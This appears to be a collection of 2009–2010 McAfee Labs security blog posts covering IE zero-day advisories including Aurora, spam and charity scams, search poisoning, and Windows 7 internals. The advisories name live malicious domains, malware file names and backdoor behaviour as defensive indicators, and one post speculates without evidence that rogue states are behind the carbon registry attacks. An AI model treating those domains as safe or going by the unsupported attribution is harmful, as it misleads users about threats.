McAfee Labs today published its March Spam Report.

This month authors Adam Wosotowsky and Elan Winkler discuss a possible charity scam in France that takes advantage of sympathy for the victims of the Haitian earthquake, examine a “ham campaign” regarding events in Haiti, and look at another fraudulent attempt to connect “lonely women” with victims’ credit cards.

Our key topics:

• Security professionals working together can expose fraudsters and sometimes bring about their arrests. One of our French researchers shows how it can work.
• The disaster in Haiti was as usual a spark for spammers, but it also caused a significant amount of legitimate “ham” email
• Spammers based primarily in China are keeping busy sending out scams offering Russian “brides” for sale

For this report and others, many available in up to eight languages besides English, visit our Threat Center Technical White Papers page.

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. This attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, this has the potential to explode now that the word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (classified as BackDoor-EMN) in drive-by download fashion (visiting the page is enough to get infected). There are multiple variants of this trojan involved. Notes.exe creates two copies of itself in the %temp% directory, and drops a DLL file. This DLL file is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

• 20100307.htm (CVE-2010-0806 exploit)
• bypasskav.txt (part of exploit obfuscation code)
  • notes.exe (backdoor installer)
    • note.exe (backdoor installer copy)
    • clipsvc.exe (backdoor installer copy)
      • wshipl.dll (backdoor)
    • rsvm.exe (backdoor installer)
      • wshipnotes.dll (backdoor)

Preliminary product coverage is as follows:

• McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
• McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
• McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
• McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
• McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
• McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

Last week Apple formally announced the launch date for the Wi-Fi version of its much anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also generated curiosity from the spammer community. They wonder how they can leverage this event to steal your sensitive information. 

Scams have already started to surface, claiming how you can win your own iPad for free. All you need to do is provide your address for shipment, and … Oh, yeah, to get your “free” iPad you also need to purchase something, which will require you to give us your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This scam is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it’s essential to identify the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams such as this are likely to emerge, using email, social media technologies, and common search engine terms for delivery. 

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

For this search three of the top five results lead to malicious links (not good). The next search moved onto Olympics-themed screensavers (which historically are heavily abused):

In this case two of the 10 results on the first page lead to malicious websites–actually less than I expected. But look what happened when I added the word download to my search:

In this case five of the 10 results on the first page were now malicious or questionable. Quite interesting. When I added an -s to download my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

Just shy of half the results on the first page lead to some very nasty sites indeed for wallpaper. Next I also searched for themed screensavers:

Again, just about half the results on the first page lead to malicious links. That’s not surprising but certainly not good. Just remember this trend: news, sporting events, and holidays are common abuse targets for cybercriminals. Be suspicious when searching for info in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday–such as Valentine’s Day–approaches and malware authors and cybercriminals ready for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

Even Rolex watches on Valentine’s Day are not safe:

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats are evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat reader.

A full copy of the Q4 2009 Threats Report is available here.

This guest post was written by Benjamin Edelman, Assistant Professor at Harvard Business School and an advisor to McAfee.

Last week I revealed troubling transmissions by the Google Toolbar: Even when a user specifically “disable[s]” the Google Toolbar, and even when the Toolbar disappears from view, the Toolbar continues tracking users online behavior—including specific web pages visited and specific searches run on other search engines. To Google’s credit, after I posted my article Google promptly fixed these nonconsensual transmissions—but big questions remain. How did this bug slip through Google’s internal testing? What happens to the data Google collected without user consent? And why was Google collecting this data in the first place?

Rethinking Disclosure
I’ve recently begun talking to all the Google Toolbar users I can find. Checking their PCs, I see that they usually have Google’s “Enhanced Features” turned on—meaning Google is tracking their every page view and every search. But they usually don’t know about that tracking. Why not? They were told—but not in a way they understood or remembered.

For one, Google discloses its tracking in a “bubble” pop-up that appears immediately after Toolbar installation. By all indications, the installation is complete, and users just want to get back to work—not answer more questions or make more decisions. This suggests a first principle: Seek consent when users are inclined to make an informed decision. This should be an integral part of an installation, not an afterthought.

Beyond the timing of disclosure, the substance of disclosure is also crucial. Google’s current installation says Enhanced Features will “tell us [Google] what site you’re visiting by sending Google the URL.” What exactly does that mean? Will Google track “sites” (such as “nytimes.com” for the New York Times) or “URLs” (referencing specific articles and searches)? Remarkably, Google’s disclosure is internally inconsistent: Google uses the terms sites and URLs interchangeably, when in fact the concepts are quite different. Certainly that’s improper. Disclosures should be clear, precise, and entirely accurate.

Communications professionals have expertise to offer. To make a disclosure clear, it should appear in a dedicated screen with a title, layout, and format that emphasize what’s important. Headings, topic sentences, and sentence structure can help users understand. How does Google stack up on these fronts? Unfortunately, Google seeks permission for Enhanced Features in a screen entitled “Introducing Sidewiki”—a marketing pitch for a new feature, hardly alerting users to the serious privacy matters that follow. Better alternatives would be “Important Privacy Decision” or “Set Your Privacy Preferences”—identifying the crux of the question and introducing the material that follows. This crucial screen should seek to inform, not to persuade. Most of all, it should be designed by policy professionals and communication professionals—not marketers.

A user seeking more information should be able to review a further document with appropriate details. Here, too, accuracy and precision are crucial, and Google’s current approach falls crucially short. Google’s statement makes no mention of these Toolbar transmissions until Page Five. Even there, Google’s text contradicts itself, both explicitly and through unavoidable interpretation of Google’s statements and omissions (details). Equally striking is Google’s defective formatting: Google loads its privacy notice in a browser window with no menu or toolbar—hence no ability for users to copy, search, save, or print these important materials. These design decisions are ill advised. Disclosures should be user friendly and should encourage users to take the time to understand them.

For these sensitive transmissions, which continue every time a user runs a web browser, disclosure need not occur just once. When a program has such important privacy consequences, it should remind users of its effects from time to time, employing an alert or message to make sure users are still onboard. A periodic reminder—perhaps once per quarter, or whenever Google Toolbar auto-upgrades to a new version—would help users remember what’s installed.

Improving the Substance of Privacy Protection
Good privacy means more than disclosure. Through sensible adjustment of data collection and retention practices, software developers can dramatically reduce the privacy implications of their services.

For one, companies should reexamine what data they collect in the first place. Do many users actually want the features purportedly justifying detailed tracking? When it comes to Google Toolbar, I have my doubts: I don’t think many users want to know page-level PageRanks. Nor does Google Sidewiki feature a quantity or quality of comments sufficient to justify the significant privacy intrusion. My guiding principles: Provide genuine value, and put users’ interests first. Collect data only when there is a compelling immediate reason, in the user’s personal interest, to do so. An amorphous benefit, such as improving service or building a community, is not good enough.

Systems should transmit as little information as possible to satisfy a user’s request. Consider two alternative approaches to tell a user the PageRank popularity of a site. In a first system, the user’s computer sends a server the full URL of the user’s request, and the server returns the PageRank of that specific page. Alternatively, the user could send just the domain name at issue, and the server could return a list of popular URLs and PageRanks on that domain. With the right system of wildcards and aggregation, the latter approach need not use much more bandwidth, and it’s a modest and reasonable increase in complexity. But the privacy benefits are dramatic: In the first system, the server learns each user’s every page view, whereas the second keeps specific page views confidential.

Finally, companies should limit data storage and its use with specific, firm commitments. Key questions: How long will data be retained? Who will have access and for what purposes? Although these questions sound obvious, they’re easy to overlook. Tellingly, you won’t find answers in Google’s Toolbar Privacy Policy, and even Google’s main Privacy Policy is silent on key details.

The Big Picture
My basic goal: Build privacy into the system. Collect less data, and collect data only when it’s actually in the users’ interest. Make sure users truly know what they’re accepting and why. Treat privacy protection as a valuable objective in its own right, not merely a hurdle standing between a company and a desired business opportunity. This may be tough medicine for those who seek to profit from tracking users in ever-greater detail, but it’s the right thing to do.

In recent weeks, various cybercrime attacks have disrupted the computer systems that allow nations to manage their national greenhouse-gas emissions quotas and their possession of carbon assets according to international agreements (the Kyoto Protocol and the European system). One quota is the right to emit the equivalent of one ton of carbon dioxide during a specified period.

The initial attack targeted the Danish CO₂ quota register that was shut down on January 12. The Danish authorities took this decision after registry users received a fake email purporting to originate from the Danish Energy Agency and redirecting the recipients to a mirror site to steal their credentials.

It seems the attackers renewed their attempt last week by sending similar emails to carbon financial services in 13 European countries. Here, too, the goal was the theft of usernames and passwords to gain access to the national CO₂ quotas management systems. This caused another quota-market closure.

Using these credentials, hackers–instead of manufacturers, governments, and brokers–would in theory be able to sell and buy quotas. During the past 18 months, fraud on the CO₂ market has caused a tax loss of €5 billion. Such access would also be useful for the biggest emitters of carbon dioxide; those countries could manipulate the international quotas to reduce their penalties. The following graphic, from Europol (the European Law Enforcement Agency), explains how such fraud can occur.

One thing is sure, the people behind these attacks cannot be simple hackers. They are likely in the pay of rogue states that reject rules-based international trade.

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

• Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
• Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
• Don’t open attachments with donation forms, as they may be executable malware
• Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit.  A few days ago exploit code was made public.  Since then malware authors have been customizing the exploits payload to install their own malicious creations.  Much of the field telemetry we’ve been receiving has been coming from McAfee users in China visiting websites in China.  Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple javascripts and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org.  A common filename is ie.html, which references what.jpg, which contains part of the exploit code (and not a JPEG image).  Some payloads seen download files named down.css and log.css, which are malware executables.  Those executables contain functionality to download other malware, including:

• Artemis!629E2332CFDA – Generic PWS.y!bsk
• Artemis!78043EBA321B – PWS-Mmorpg!la
• Artemis!911BCF95C022 – PWS-OnlineGames.gx
• Generic Downloader.x!coe
• Generic Dropper!byp
• Generic PWS.y!bsk
• PWS-Mmorpg!la
• Suspect-02!50CB7D4BB04E – Generic Dropper.hi
• Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
• Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
• Suspect-26!B01B63F88994 – PWS-Mmorpg!la

Given that exploit code is readily available, this is likely the tip-of-the tip of the iceberg in terms of the domains and malware we are likely to see over the next few weeks (and we can expect to see new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computer World reported that private exploits were created which exploit Internet Explorer 7 & 8, but that those exploits would remain private.  Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that they would release an out of cycle patch for this vulnerability.  McAfee Labs advices those tempted to install an unofficial patch to think twice before doing so as malware and adware often arrive under the guise of such a “fix”.

On Saturday, my McAfee Labs colleague Craig Schmugar wrote about phishing sites and email scams related to the recent earthquake in Haiti. The people behind these frauds deserve to be caught by the law. I have a story that demonstrates that when several researchers join forces the bad guys run the risk of being punished.

On Sunday, among the hundreds of emails I received about Operation Aurora, I had one from Nick FitzGerald, a well-known anti-malware researcher. He asked for my opinion about a possible charity scam with a French origin.

Nick asked me to verify the details: an easy thing for a French speaker. After I tried calling the mobile phone number and got an answering machine, I contacted the town hall where the requester claimed to have his company. The official in charge did not know this company nor any local initiative in favor of the Haitian people.

Two Internet searches allowed me to identify a possible sender. First of all, I used the phone number and discovered–in the same administrative division–an individual selling a Mercedes.

As I suspected another rip-off (you pay an advance fee and you never see your car), I used the company name and discovered a professional diary with the name of the managing director: the same name as the car seller.

Finally, and just as I prepared my response to Nick, I received a call from some friends working at the French banking industry’s Computer Emergency Response Team. They had made the same discoveries, and they were also able to direct me to some court rulings related to this person. He was sentenced in 2009 after he used false insurance certificates and false bank guarantees.

Yesterday, I forwarded all these data to the authorities and hope that they will take appropriate steps. I cannot claim that this individual is once again breaking the law; in France we do enjoy the presumption of innocence. However, this story should prompt you to be vigilant and to not fall for email charity scams.

Last week the U.S. FBI released a warning on this subject.  Yesterday, they renewed the message with the following guidelines:

• Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
• Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
• Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
• Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
• Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
• To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
• Do not be pressured into making contributions, as reputable charities do not use such tactics
• Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft.
• Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

I strongly agree with this advice!

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which educates attendees to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora–the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks–involving social media, mobile, Unix, and more.

Click here to learn more and register today.

In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge.  Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc; it makes sense that attackers would try to incorporate an unpatched Internet Explorer vulnerability and Haiti-related web content.

I figured a good place to look for attackers is by Googling the most popular search terms of the day.  It’s been a while since I last researched search engine manipulation.  As expected it was quite easy to find high ranking search results for Haiti-related terms; the vast majority led to rogue antivirus malicious sites, similar to earlier blogs.  I did not come across any sites exploiting the recent zero-day IE vulnerability.  However, I did come across plenty of Clickjacking, but not just Clickjacking, they have incorporated Google Trends, Digg.com, Blackhat SEO, and Clickfraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user following the link on Digg.com, they are taken to a generic website, enticing them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note the sites in the image below are potential victims here too as they could be charged for “unwanted clicks” on their ads).

This form of Clickfraud can generate money for the attacker.  If this fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.

The web server shows many search terms seeded this way, including several related to Haiti:

• haiti-breaking-news
• haiti-earthquake-damage
• haiti-earthquake-info
• haiti-earthquake-relief
• haiti-earthquake-time
• haiti-pact-with-the-devil
• haiti-pat-robertson
• haiti-relief-effort
• haiti-support
• haitian-earthquake-relief
• haitian-relief-efforts
• hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is release; a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’,  on the McAfee’s Security Insight blog  The purpose of this blog is to answer questions about this particular attack; fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer;  Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, or opening an email attachment, etc).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations to be vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are affected.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E“), proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for McAfee, she forwarded it to me for my opinion.

As soon as I read it, I knew it was a hoax and told her just to delete it.

It didn’t really surprise me that these Hoaxes are now being spread via BBM as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via E-mail about a Virus which burns the whole hard disc C of your computer , well now I believe you will be seeing them on your BlackBerry.

I don’t want to take the usual route of blaming Social Networks sites but I believe they are the cause for this new wave of Hoaxes. The problem with Social Networks is that it enables almost anyone to be able to add you on several different IM’s by just visiting your page if you do not set your privacy settings correctly.

The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry pin. This makes it incredibly easy for people who you don’t know to add you to their contact list, which leaves you open to receiving more Hoaxes or Spam messages.

I have personally seen lots of these barcodes on several Social networks and forums and warn those who read this blog not to do the same and only share their PIN with contacts they trust.

Users should be careful who they accept as contacts, as you may start to see a lot more of these Hoaxes or even Spam in your BBM inbox.

Unlike the first malware authors who wrote viruses seeking fame through destruction, their motivation has changed to financial gain.

Nevertheless, there are still the ones out there who share the first authors’ intent. I was analysing a simple Trojan today and saw the following message:

It is not uncommon for malware authors to leave messages in their code for Researchers to read.

This one did bring a smile to my face, so he was rewarded by it being named BackDoor-EKD which is an increment of one from BackDoor-EKC

In my last blog, we have discussed the kernel API refactoring in Windows 7, today we are going to look at a new feature of Windows 7 – XP Mode, which is a combined solution of Virtualization and RemoteApp technologies.
For quick understanding on Windows XP Mode, let’s look at an excerpt from Wikipedia about its definition: “Windows XP Mode (XPM) is a virtual machine package for Windows Virtual PC containing a pre-installed, licensed copy of Windows XP SP3 as its guest OS. Pre-installed integration components allow applications running within the virtualized environment to appear as if running directly on the host, sharing the native desktop and Start Menu of Windows 7 as well as participating in file type associations. XP Mode applications run in a Terminal Services session in the virtualized Windows XP, and are accessed via Remote Desktop Protocol by a client running on the Windows 7 host. Applications running in Windows XP mode do not have compatibility issues as they are actually running inside a Windows XP virtual machine and redirected using RDP to the Windows 7 host.”
After its successful installation, XPM provides 3 operation modes. You can run Windows XP Mode as a full Windows XP desktop in Enhanced Mode and Basic Mode, which have no different from what you see when you play with a normal Virtual PC product (see the screenshot below, Virtual PC and XP VM is visible).

Virtual Applications Mode is the third mode, when running in this mode, you can launch and run your virtual applications and they are seamlessly integrated with the Windows 7 desktop and Start menu. In the following screenshot, Virtual PC and XP VM is not visible, but two virtual application (TCPView and Process Explorer) which are actually running inside the XP VM are displayed on Windows 7 host desktop as if they are just running on the host. If you are familiar with VMware, you might feel this mode is little similar to VMware’s Unity feature, but their internal implementation are not the same.

Because the XP VM is not visible and accessible under the Virtual Applications Mode, in order to figure out how the virtual application works, we need to publish and launch the TCPView and Process Explorer utilities to Windows 7 host’s desktop, virtual application will be automatically published to Windows 7 host if their shortcuts have been created in “All Users” profile inside the XP VM (\Documents and Settings\All Users\Start Menu\Programs).

From the TCPView output, we can see that the Windows 7 host doesn’t connect to the XP guest’s Remote Desktop Service directly, instead it uses a Virtual Machine Guest Service (vmsrvc.exe) running inside the XP guest, which connects locally to the port 3389 listened by Terminal Service (termsrv.dll hosted by svchost.exe). The Virtual Machine Guest Service then communicates with the Virtual PC Host Process (vpc.exe) over VPCBus (similar to the VMBus of Hyper-V), which is a private host-guest communication channel, because there is no actual inter-VM network involved, this communication mechanism is fast and efficient. On the host side, the Virtual PC Host Process acts as a named pipe server while another Virtual PC component Vmsal.exe acts as its named pipe client, which mediates the launching of the virtual application on the host. Through this bidirectional channel between Windows 7 host and XP guest with multiple components involved, user’s input (keyboard/mouse events) are kept forwarded to the VM, while the graphics generated in the VM in response to user’s keystrokes and mouse clicks are packaged and sent to be remotely presented on Windows 7 desktop.

From the process tree view below, we know that both TCPView and Process Exploer are running inside a RemoteApp session of XP VM and they both are the child processes of rdpinit.exe (RDP shell logon process).

In fact XPM is one application of Microsoft Enterprise Desktop Virtualization (Med-V), which is just one solution of Microsoft’s Virtualization family. Also other Virtualization solutions include Server Virtualization (Hyper-V), Application Virtualization (App-V), and Profile Virtualization (Folder Redirection and User Profile Roaming features of Windows Vista) etc. I’ll be writing a blog about Microsoft App-V technology (formerly named SoftGrid) internals coming soon…

After the public release of Microsoft Windows 7, I saw many people were curious about and showed great interest in “MinWin”, but most of them were not able to understand or explain it correctly and they often confused “MinWin” with “Server Core”. So what does exactly the term “MinWin” mean?
One of Microsoft goals for Windows Server 2008, “Server Core” (formerly known as “Server Foundation”) is a variant with a sub-set of the entire Windows operating system that contains enough components to run various common server roles, such as AD, DNS, DHCP Server and IIS. On the other hand, the “MinWin” is a small, self-contained operating system that has no dependencies on higher-level components, and is most well-known for being minimalistic, self-contained set of Windows components was shipped as part of Windows 7.
One Microsoft Windows developer describes “MinWin” as “refactoring code along architectural layering lines”. Actually from Windows Vista (some of the componentization and refactoring work was already shipped with Windows Vista) which is arguably the first “MinWin” based operating system, every component of the operating system was assigned a “layer number” that represents its dependency position relative to other components, with more lower-numbered components being more closer to the core of the operating system, and “code refactoring” need to be done by the core architecture team to resolve the dependency issues where low-level components were reliant on high-level components. Next let’s look at how this “layering” and “code refactoring” are implemented in Windows 7 by using an example.

